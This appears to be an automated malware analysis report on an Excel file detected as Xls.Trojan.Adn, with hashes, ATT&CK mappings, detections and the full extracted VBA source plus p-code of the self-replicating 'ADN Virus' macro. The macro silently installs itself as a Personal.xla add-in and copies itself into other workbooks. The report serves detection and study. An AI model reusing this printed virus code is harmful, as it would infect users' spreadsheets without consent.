Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd938e55ac48d3b9…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-12-06 20:55:44 Authoring application: Microsoft Excel First seen: 2015-10-03
MD5: d9b38ef2c081c2cf0379768df9bf52d0 SHA-1: fac3f809e0e15e7a9820a5dfd018168b16753570 SHA-256: bd938e55ac48d3b91ebcaa4f9a512ceaf65a5cb976b85bf9dd852abc4fbe1417
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to save a component as 'Personal.xla' in the application's path, suggesting it's part of a payload delivery or persistence mechanism. The ClamAV detections further confirm its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.Adn-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adn-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8424 bytes
SHA-256: fa6e64050c2a3ee863ffcedd660d8265e6bc2c355d59f1753ecdbfb694e5ef15
Detection
ClamAV: Xls.Trojan.Adn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "X316"
' Spalaci Label is Pac
' ADN Virus - (C) Copyright 1999/2000
Public Indexe As String

Private Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
For i = 1 To ThisWorkbook.VBProject.VBComponents.Count
    Cadena = ThisWorkbook.VBProject.VBComponents(i).Name
    Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
    Fusion = (Letras & Val(Numero))
    If Cadena = Fusion Then
       Indexe = ThisWorkbook.VBProject.VBComponents(i).Name
    End If
Next
Application.OnSheetActivate = "ClassModulo"
End Sub

Private Sub ClassModulo()
Attribute ClassModulo.VB_ProcData.VB_Invoke_Func = " \n14"
    Randomize: install = 0
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    Intr = Int((Rnd * 1000) + 1)
    Iltr = Int((90 - 65 + 1) * Rnd + 65)
    Play = (Chr(Iltr) & Intr)
    If ThisWorkbook.Name <> "Personal.xla" Then
       If Dir(Application.Path + "\Personal.xla") = "Personal.xla" Then install = 1
       If install = 0 Then
          Workbooks.Add.SaveAs FileName:=Application.Path + "\Personal.xla"
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents.Import (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents(Indexe).Name = Play
          Workbooks("Personal.xla").IsAddin = True
          Workbooks("Personal.xla").Save
          AddIns.Add(Application.Path + "\Personal.xla").Installed = True
       End If
    Else
       For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
           Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name
           Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
           Fusion = (Letras & Val(Numero))
           If Cadena = Fusion Then install = 1
       Next
       If install = 0 Then
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          ActiveWorkbook.VBProject.VBComponents.Import (Indexe)
          ActiveWorkbook.VBProject.VBComponents(Indexe).Name = Play
       End If
    End If
    If Day(Now()) = Int((31 * Rnd) + 1) Then
       Application.Caption = "Spalaci.Label.Is.Pac"
       Application.CommandBars.LargeButtons = True
    End If
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub


' Processing file: /opt/analyzer/scan_staging/4567d078a06f417183f1cc48322cc47d.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 965 bytes
' _VBA_PROJECT_CUR/VBA/Hoja1 - 956 bytes
' _VBA_PROJECT_CUR/VBA/X316 - 3847 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0015 " Spalaci Label is Pac"
' Line #1:
' 	QuoteRem 0x0000 0x0024 " ADN Virus - (C) Copyright 1999/2000"
' Line #2:
' 	Dim (Public) 
' 	VarDefn Indexe (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub auto_open())
' Line #5:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #6:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #7:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #8:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #9:
' 	Ld Cadena 
' 	Ld Fusion 
' 	Eq 
' 	IfBlock 
' Line #10:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Indexe 
' Line #11:
' 	EndIfBlock 
' Line #12:
' 	StartForVariable 
' 	Next 
' Line #13:
' 	LitStr 0x000B "ClassModulo"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #14:
' 	EndSub 
' Line #15:
' Line #16:
' 	FuncDefn (Private Sub ClassModulo())
' Line #17:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St install 
' Line #18:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #19:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #20:
' 	Ld Rnd 
' 	LitDI2 0x03E8 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	St Intr 
' Line #21:
' 	LitDI2 0x005A 
' 	LitDI2 0x0041 
' 	Sub 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	Ld Rnd 
' 	Mul 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	St Iltr 
' Line #22:
' 	Ld Iltr 
' 	ArgsLd Chr 0x0001 
' 	Ld Intr 
' 	Concat 
' 	Paren 
' 	St Play 
' Line #23:
' 	Ld ThisWorkbook 
' 	MemLd New 
' 	LitStr 0x000C "Personal.xla"
' 	Ne 
' 	IfBlock 
' Line #24:
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x000C "Personal.xla"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St install 
' 	EndIf 
' Line #25:
' 	Ld install 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #26:
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	ParamNamed FileName 
' 	Ld Workbooks 
' 	MemLd Add 
' 	ArgsMemCall SaveAs 0x0001 
' Line #27:
' 	Ld Indexe 
' 	Paren 
' 	Ld Indexe 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #28:
' 	Ld Indexe 
' 	Paren 
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #29:
' 	Ld Play 
' 	Ld Indexe 
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemSt New 
' Line #30:
' 	LitVarSpecial (True)
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemSt IsAddin 
' Line #31:
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall Save 0x0000 
' Line #32:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	Ld AddIns 
' 	ArgsMemLd Add 0x0001 
' 	MemSt Installed 
' Line #33:
' 	EndIfBlock 
' Line #34:
' 	ElseBlock 
' Line #35:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #36:
' 	Ld i 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #37:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #38:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #39:
' 	Ld Cadena 
' 	Ld Fusion 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St install 
' 	EndIf 
' Line #40:
' 	StartForVariable 
' 	Next 
' Line #41:
' 	Ld install 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #42:
' 	Ld Indexe 
' 	Paren 
' 	Ld Indexe 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #43:
' 	Ld Indexe 
' 	Paren 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #44:
' 	Ld Play 
' 	Ld Indexe 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemSt New 
' Line #45:
' 	EndIfBlock 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x001F 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	Eq 
' 	IfBlock 
' Line #48:
' 	LitStr 0x0014 "Spalaci.Label.Is.Pac"
' 	Ld Application 
' 	MemSt Caption 
' Line #49:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd CommandBars 
' 	MemSt LargeButtons 
' Line #50:
' 	EndIfBlock 
' Line #51:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #52:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #53:
' 	EndSub 
' Line #54:

Open this report in the interactive analyzer, or submit your own file for analysis.